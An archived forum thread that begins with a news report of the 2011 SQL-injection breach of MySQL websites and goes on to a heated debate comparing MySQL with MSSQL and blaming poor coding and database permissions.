PCFormat Forum Archive

An email was sent out earlier today on the Full-Disclosure mailing list, detailing the compromise of numerous MySQL websites along with portions of their database containing usernames and passwords.

MySQL offers database software and services for businesses at an enterprise level as well as services for online retailers, web forums and even governments. The vulnerability for the attack, completed using blind SQL injection and targeted servers including MySQL.com, MySQL.fr, MySQL.de and MySQL.it, was initially found by "TinKode" and "Ne0h" of Slacker.Ro (according to their pastebin.com/BayvYdcP dump of the stolen credentials) but published by "Jackh4x0r".

The stolen database contain both member and employee email addresses and credentials, as well as tables with customer and partner information and internal network details. Hashes from the database have been posted, with some having been already cracked.

Source

Ouch...

Wow - we use MySQL for many of our music and spot databases. Thanks for the heads up

........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................

I am going to check none the less.

MySQfaiL

You get what you pay for.

q: how often do the package devs get involved in the web interface?
a: less than 0.00002% of the time..

bad web dev != bad MySQL... just saying... lousy internet presence should hardly be equated to vulnerabilities in the product... MySQL has plenty of flaws, but this "hack" is a flaw shared by every SQL engine out there....

rustypup wrote:MySQL has plenty of flaws

Oh, the thesis I could write in reply to this statement

jamin_za wrote:

rustypup wrote:MySQL has plenty of flaws

Oh, the thesis I could write in reply to this statement

We're here now, you might as well entertain us: MySQL vs MSSQL in this regard?

@Senile: A use on MSSQL with the correct rights can grant permissions and create users the same as can be done in MySQL......
The flaw is that the user used for accessing the database from a web front end should under no condition have the required access to perform such operations. It is an implementation flaw rather than a SQL design flaw. You can have the most secure system in the world but if it is not used correctly it will be as secure as a piece of swiss cheese....


Oh my.... the CHEESE....

senile wrote:MySQL vs MSSQL

Rant inbound...

MySQL does not do replication well, it does not do recovery well, it cannot do transactional processing with any degree of reliability, it's user interface would have been tiresome 20 years ago, it does not adhere to SQL norms and syntax in a lot of fundamentally silly ways and even the simplest of configuration and troubleshooting steps are a chore.
What it does do well is cost nothing and run simple queries fast. It is good for serving webpages or hosting dumb data stores.
It is over-hyped by fanboi developers and up until version 5 and InnoDB I would have flat out refused to even look at it as a database option.

I am completely amazed by peoples attempts to build complex applications around it. Just because it is free and every half-arsed developer and his fleshlight can install one and begin writing software for it does not mean you should. I have watched some truly laughable attempts to integrate it into Windows environments, I have seen some very creative ways people have tried to get it to aggregate data - just because it makes a neat data warehouse, does not mean it can also process that raw data into something usable...

Facebook has a MySQL farm. Thats should tell you everything you need to know.

I'm not going to extoll the virtues of MSSQL - just read all the faults I listed about MySQL and know MSSQL does it better.
It's not perfect, it has it's drawbacks, it needs more money, bigger hardware and you will probably pay your devs and admins more to look after it, but it's not for nickel-and-dime operators.

RuadRauFlessa wrote:A use on MSSQL with the correct rights can grant permissions and create users the same as can be done in MySQL

wat?

........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................

I was asked to comment on MySQL vs MSSQL - you must have missed that part because your reply is telling me not to compare them...

-Prometheus- wrote:I'll bet if you compare MSSQL you will find flaws there that are not in MySQL.

Find me some.

-Prometheus- wrote:The same way I would entrust my life to the best opensource app, Truecrypt, but I won't touch MS' proprietary Shytelocker carp.

http://esec-lab.sogeti.com/dotclear/ind ... pt-english

-Prometheus- wrote:MySQL does a near perfect job for what it was intended to do.

I already said it did.

-Prometheus- wrote:So much actually that even large organisations are using it with great success for what it wasn't intended for.

Which large corporations, and what are they using it for

-Prometheus- wrote:using bookface as an example, come on man!!!

Why not? Facebook is a perfect example of a basic and fairly dumb database. One person puts stuff in and then thousands read from it. There is virtually no data transformation. Once it is in there, it's in there.

-Prometheus- wrote:Don't blame the developer's mistake on the software used.

In this case the developers who allowed the vulnerability also wrote the backend that was exploited. Who should I blame here?

-Prometheus- wrote:I will continue to use it and not pay extra for a windows webhost with no benefit.

You still dont get my argument. Using it as a webhost is fine. That is what it was built to do.
Use it for something complex and see how far you get.

........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................

-Prometheus- wrote:

jamin_za wrote:

-Prometheus- wrote:I'll bet if you compare MSSQL you will find flaws there that are not in MySQL.

Find me some.

Since I haven't really used it..

For the record, I have supported both databases, so I know their relative strengths and weaknesses.
At the end of the day, if you want simple stuff done really fast, use MySQL
If you want a full featured, robust DBMS for both transactional and analytical application use MSSQL (or Oracle, or DB2, or ADABAS - but that's a different argument)

........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................
........................................................................................................................................................................................................

jamin_za wrote:For the record, I have supported both databases, so I know their relative strengths and weaknesses.
At the end of the day, if you want simple stuff done really fast, use MySQL
If you want a full featured, robust DBMS for both transactional and analytical application use MSSQL (or Oracle, or DB2, or ADABAS - but that's a different argument)

Wow this is probably the first time ever I have to agree with hamin.... scary...

Seriously people... The particular exploit is not a flaw of a DBMS but rather a combination of bad administration and coding. If the coders who did the website (And for the record I can guarantee you that it isn't the same bloke who wrote the MySQL DBMS) had half a brain they would guard against SQL Injection. If their DBA had half a brain he would not allow them to connect to the DBMS with a user who has administrative rights.

Jamin Vs. religion and -Prometheus-
Jamin Vs. MySql and -Prometheus-

Why you argue so much?

egzackery